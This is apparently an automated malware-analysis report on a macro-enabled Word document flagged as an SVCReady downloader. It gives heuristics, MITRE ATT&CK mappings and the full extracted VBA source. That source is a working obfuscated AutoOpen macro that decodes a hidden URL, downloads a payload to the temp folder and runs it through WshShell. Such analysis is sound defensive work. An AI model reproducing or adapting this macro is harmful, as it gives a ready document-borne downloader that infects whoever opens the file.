MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon document opening. The script constructs a temporary file path, "C:\Users\Public\main.theme" or "C:\Windows\Temp\main.theme", and uses the Shell execute function to run it, indicating it's designed to download and execute a second-stage payload. The presence of the 'Doc.Downloader.SVCReady' ClamAV detection further supports this analysis.
Heuristics 7
-
ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
-
External relationship high OOXML_EXTERNAL_RELExternal target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\us.jpg
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
- http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
- http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
- http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2018/wordml/cexOOXML external relationship
- http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
- http://schemas.microsoft.com/office/word/2018/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
- http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3950 bytes |
SHA-256: 09cb568765d30c43241822b5e45da529a65c91ca0e3a16c9144c4c7d4851773d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "c271b6e6"
Function c4417564()
c4417564 = ActiveWindow.StyleAreaWidth
End Function
Function dd4d52ad()
dd4d52ad = ActiveWindow.DisplayRulers
End Function
Function ed2091c4()
ed2091c4 = ActiveWindow.WindowState
End Function
Sub AutoOpen()
Dim f1a0f3ff As New d4a71a51
aaa = b943a190(a2069450)
a3931461 = f1a0f3ff.e1f7776c(aaa, "")
e3fd31f7 c63bf810, a3931461
b6d24304 = b943a190(ActiveDocument.Shapes(1).Title)
Dim cae04641 As New WshShell
cae04641.exec "" & b6d24304 & " " & c63bf810
End Sub
Attribute VB_Name = "ba732b87"
Function f61e351c()
f61e351c = ActiveWindow.Width
End Function
Function e1533a26()
e1533a26 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function f954ca51()
f954ca51 = 21595.857320986
End Function
Sub e3fd31f7(d1e0872f, e8e9e60c)
Dim c382cced
c382cced = FreeFile
Open d1e0872f For Output As #c382cced
Print #c382cced, b91ce79a(e8e9e60c)
Close #c382cced
End Sub
Function c63bf810()
c63bf810 = Environ("tmp") & "\main.theme"
End Function
Function b92a0802()
b92a0802 = ActiveWindow.UsableHeight
End Function
Function f03cee5d()
f03cee5d = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function bfac58a3()
bfac58a3 = ActiveWindow.DisplayLeftScrollBar
End Function
Function b943a190(e96d606d)
For e56921c0 = 1 To Len(e96d606d) Step 3
e4edf74b = Mid(e96d606d, e56921c0, 1)
dda39da1 = dda39da1 & e4edf74b
Next
b943a190 = dda39da1
End Function
Function aa219a7b(ad2ac5c3np As String) As Boolean
If 265 = Len(ad2ac5c3np) Then
aa219a7b = False
End If
End Function
Function a1da6ad3(d2d60111np As String) As Boolean
If 17208 / 36 > Len(d2d60111np) Then
a1da6ad3 = True
End If
End Function
Function bdfd8b04()
bdfd8b04 = 29131 * 1
End Function
Sub c23af6d7()
End Sub
Function b0df32bf()
b0df32bf = ActiveWindow.StyleAreaWidth
End Function
Function ef498d1b()
ef498d1b = Application.ActiveDocument.ConsecutiveHyphensLimit
End Function
Function d4d3fb24()
d4d3fb24 = ActiveWindow.Selection
End Function
Function b91ce79a(e8e9e60c)
b91ce79a = StrConv(e8e9e60c, 64)
End Function
Function d2304799()
d2304799 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function bc8c4ade()
bc8c4ade = ActiveWindow.Selection
End Function
Function dd4a322c()
dd4a322c = True
End Function
Function a2069450()
a2069450 = ActiveDocument.Shapes(1).AlternativeText
End Function
Attribute VB_Name = "d4a71a51"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function a20046f4(ab11ba6e As Long) As Long
Dim a6641164 As Long
For a6641164 = 36 To 51
ab11ba6e = ab11ba6e - a6641164
Next a6641164
a20046f4 = ab11ba6e
End Function
Function df157286() As Long
Dim b6f8e427 As Integer
Dim ddaf26dd As Integer
ddaf26dd = 187
For b6f8e427 = 8 To 65
ddaf26dd = ddaf26dd - b6f8e427
Next b6f8e427
df157286 = ddaf26dd
End Function
Function cdb3f6a1()
cdb3f6a1 = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function e1f7776c(bc274be4, d9fbeca7)
Dim f45406f1 As Object
Set f45406f1 = New MSXML2.XMLHTTP60
Call f45406f1.Open("GET", bc274be4, False)
f45406f1.Send
e1f7776c = f45406f1.responsebody
End Function
Function fce5dd96()
fce5dd96 = ActiveWindow.UsableHeight
End Function
Function ce3248ee()
ce3248ee = False
End Function
Function bf3c1298()
bf3c1298 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function ea0f4e62(e7f0e1b9)
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 26112 bytes |
SHA-256: a2e13d5290176254b42b0c8665eee10aafa88b0eafa84539f807480141debab4 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.